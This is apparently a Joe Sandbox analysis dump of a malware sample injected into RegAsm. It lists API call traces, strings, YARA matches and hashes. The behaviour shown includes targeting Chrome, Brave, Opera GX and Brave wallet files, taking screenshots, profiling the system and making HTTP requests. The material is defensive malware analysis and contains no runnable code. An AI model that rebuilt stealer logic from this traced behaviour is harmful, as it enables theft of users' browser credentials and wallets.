                                                                                                                                                        • wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                        • wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                        • wsprintfA.USER32 ref: 00414E16
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                                                        • _memset.LIBCMT ref: 00414E28
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                        • strtok_s.MSVCRT ref: 00414E82
                                                                                                                                                        • _memset.LIBCMT ref: 00414E94
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                                                                        • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                                                        • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                        • API String ID: 2867719434-332874205
                                                                                                                                                        • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                        • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                                                                        • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                        • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                                                          • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                                                          • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                                                          • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                        • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                        • API String ID: 2819533921-2709115261
                                                                                                                                                        • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                        • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                                                        • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                        • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                                                        • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                                                          • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                                                          • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                                                          • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                                                          • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040A76E
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
                                                                                                                                                        • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                        • API String ID: 3650549319-1189830961
                                                                                                                                                        • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                                                        • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                                                                        • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                                                        • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

                                                                                                                                                        APIs
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C68F688,00001000), ref: 6C6035D5
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6035E0
                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6035FD
                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C60363F
                                                                                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C60369F
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C6036E4
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C603773
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F688), ref: 6C60377E
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F688), ref: 6C6037BD
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C6037C4
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F688), ref: 6C6037CB
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F688), ref: 6C603801
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C603883
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C603902
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C603918
                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C60394C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                        • API String ID: 301339242-3790311718
                                                                                                                                                        • Opcode ID: 6d400835a38ead455e3c0a52826a322bf4c1c202bd60ec5f8fd97a6a3ecaeb17
                                                                                                                                                        • Instruction ID: 77c03169ab34dfd063cd06764ccb9386e61cc40c37245df8d397b4e71293c8d1
                                                                                                                                                        • Opcode Fuzzy Hash: 6d400835a38ead455e3c0a52826a322bf4c1c202bd60ec5f8fd97a6a3ecaeb17
                                                                                                                                                        • Instruction Fuzzy Hash: FCB1D875B0A310AFDB08DF2AC99461A77F5BB8B701F148A3DE499D3750D73098418BAE
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                        • API String ID: 3541214880-445461498
                                                                                                                                                        • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                                                        • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                                                                                        • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                                                        • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                        • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                          • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                          • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                          • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                          • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                          • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                          • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                                                        • wsprintfA.USER32 ref: 00411949
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                        • API String ID: 2280294774-461178377
                                                                                                                                                        • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                        • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                                                                        • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                        • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: /$UT
                                                                                                                                                        • API String ID: 0-1626504983
                                                                                                                                                        • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                        • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                                                                        • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                        • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                        • String ID: ERROR$ERROR$GET
                                                                                                                                                        • API String ID: 3863758870-2509457195
                                                                                                                                                        • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                        • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                                                                        • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                        • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                                                                        APIs
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                                                        • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                          • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                          • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                                                        • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2610876673-0
                                                                                                                                                        APIs
                                                                                                                                                        • wsprintfA.USER32 ref: 0041546A
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                                                        • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$File$Find$Close$AllocCreateFirstHandleLocalNextReadSizelstrcpywsprintf
                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                        • API String ID: 457158367-4073750446
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
